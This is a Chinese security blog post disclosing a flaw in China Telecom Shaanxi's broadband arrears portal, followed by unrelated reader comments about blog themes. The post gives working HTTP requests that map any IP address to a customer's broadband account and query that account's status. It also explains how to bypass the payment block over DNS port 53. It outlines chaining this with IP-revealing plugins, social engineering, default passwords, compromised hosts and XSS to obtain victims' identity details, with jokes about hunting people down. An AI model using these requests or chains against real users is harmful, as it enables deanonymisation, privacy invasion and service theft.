当前位置: 首页 > 代码审计, 网络安全 > 正文

中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码

标题:

中国电信ADSL宽带信息泄露+欠费照样上网,可查任意IP对应的宽带账号、电话号码、身份证、户口本,上门砍人。

标题纯属娱乐……

家里宽带有一段时间没用了,打开一开,你妹的,跳到欠费页面,好吧,既然上不了网,就研究一下电信ADSL宽带在欠费情况下会出现什么状况……

花了点时间分析了下,于是这篇文章就出来了(此处针对的是陕西电信,其他省市应该雷同)。

电信有线宽带欠费状态:

1、拦截使用任何通讯,TCP、ICMP、UDP等协议只允许访问电信官网,例如:sn.189.cn,推测是基于IP过滤。

2、但可以使用53端口的UDP通讯(DNS查询协议)。

3、不限制53端口UDP通讯的目标IP地址,例如:nslookup lcx.cc 8.8.8.8,所以可以使用udp代理绕过电信拦截,访问互联网。

4、任何访问80端口的数据(任何IP地址,除了电信官方网站,例如:sn.189.cn),将被强制重定向到“http://sn.189.cn/jsp/691error/queryTypes.jsp”(电信可以随时劫持任何通讯)。

5、可以无障碍访问电信官方网站,例如:sn.189.cn,其他域名将被重定向(参考:4)。

重定向后的流程:

1、首先访问691错误页面:

GET http://sn.189.cn/jsp/691error/queryTypes.jsp

提示:返回的数据中会存在一些有价值的信息,例如:

var ip = "113.*.*.193";

2、然后通过IP查询对应的宽带账号:

(呵呵,这证明电信会实时储存IP对应的用户信息,所以嘛,公安抓你很容易……)

POST /freeAccountLogin HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://sn.189.cn/jsp/691error/queryTypes.jsp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: sn.189.cn
Content-Length: 17
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ******

ip=113.*.*.193

返回数据:

HTTP/1.1 200 OK
Date: Sat, 13 Apr 2013 02:49:37 GMT
Content-Length: 40
Content-Type: text/json; charset=utf-8
P3P: CP=CAO PSA OUR
X-Powered-By: Servlet/2.5 JSP/2.1

{"account":"02900******","latnId":"290"}

提示:

GET方式也可以,例如:http://sn.189.cn/freeAccountLogin?ip=113.***.***.192

这里存在严重的信息泄露安全隐患:

我们可以修改参数为任意ip,查询任何人的宽带账号(提示:配合QQ显IP插件,你懂的),再进一步社工+渗透,可以得到姓名、身份证、住址、电话号码等绝密私人信息(我怎会告诉你:在电信官网密码找回或简单社工,而且很多是默认密码,直接进去,户口本就有了……),从而做到上门砍人,咳咳,扯远了……

你懂的……

中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码|电信ADSL任意IP|熊猫博客

亲,电话号码露出来了……

深入一下:

如果这里绑定了本机IP,只能查到自己IP对应的账号,那么我们该如何操作呢?

假设绑定了IP,仍旧还存在其他安全隐患,例如:在肉鸡上开代理(和很多年前刷钻一样,你懂的)、XSS,等其他手段都可以获取到这个信息,或者扫描陕西电信IP段存在的天然代理,例如6666端口,具体不解释,你懂的……

3、然后查询该宽带账号的信息:

POST /service/error/queryTypes.action HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://sn.189.cn/jsp/691error/queryTypes.jsp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: sn.189.cn
Content-Length: 29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ******

loginName=02900******&latnId=290

(GET也可以:http://sn.189.cn/service/error/queryTypes.action?loginName=02900******&latnId=290)

提示:这里参数 loginName 没有限制,所以你可以查询任何宽带账号的状态……

返回数据:

HTTP/1.1 200 OK
Date: Sat, 13 Apr 2013 03:03:57 GMT
Content-Length: 11
P3P: CP=CAO PSA OUR
X-Powered-By: Servlet/2.5 JSP/2.1

{"msg":"1"}
中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码|电信ADSL任意IP|熊猫博客

msg参数对应的状态:

success:function(data) {
    if(data.msg=='0') {
        //该帐户当前属非正常状态,请您携带有效证件到营业厅办理或拨打10000号咨询。
        window.location.href="/jsp/691error/shutdown.jsp";
    }else if(data.msg=='1') {
        //您好,您的宽带已欠费!
        window.location.href="/jsp/691error/qryowemoney.jsp";
    }else if(data.msg=='3') {
        //请您拨打10000号,联系客服人员处理。
        window.location.href="/jsp/691error/otherTypes.jsp";
    }else if(data.msg=='4') {
        $("#error").show();
        $("#error").html('<h5>系统繁忙,请稍后再试!</h5>');
    }
}
error: function(json) {
    $("#error").show();
    $("#error").html("");
    $("#error").append("<h5>系统忙,请稍后再试!</h5>");
}

4、然后重定向页面到状态码对应的Url地址:

例如:

中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码|电信ADSL任意IP|熊猫博客

您好,您的宽带已欠费!

http://sn.189.cn/jsp/691error/qryowemoney.jsp

5、然后该干嘛干嘛去……

介于该漏洞的严重性,已提交给相关部门处理……

亲们请勿尝试任何非法活动,后果自负!!!


本文固定链接: http://www.chnpanda.com/682.html | 熊猫博客 | 转载请注明出处,谢谢合作!

本文关键字:

中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码:目前有8 条留言

  1. 沙发
    Social:

    这漏洞不错

    2014-03-17 上午9:01 [回复]
    • 是挺好的,对了哥们你觉得我这主题怎么样,随便说

      2014-03-17 上午10:56 [回复]
      • 我一开始用wp的时候就在找这个主题,但是一直没找到。后来用了d8

        2014-03-17 下午12:52 [回复]
        • 刚才我在换Hcmd的主题,但是换过后前后台空白,应该是不兼容,那个主题挺好看。

          2014-03-17 下午12:54 [回复]
          • 你用的这个主题似乎没手机版的?我看了好几个都只有电脑版。我比较喜欢自适应的主题

            2014-03-17 下午1:17 [回复]
            • 是的,没有自适应的,现在也不好换主题了,百度权重1了,换的话影响很大,当时也没仔细想那么多,感觉你那个主题太宽了

              2014-03-17 下午1:19 [回复]
              • 额,你这个评论还要点那个小点。我刚刚用手机点了半天没回复成功

                2014-03-17 下午2:02 [回复]
                • 哈哈,等会换个插件吧,这个主题还有好多不足之处,就是有几个验证码插件不支持,我到时在仔细找找,这个太烂了

                  2014-03-17 下午2:04 [回复]

发表评论

亲,不支持纯字母、符号评论哦~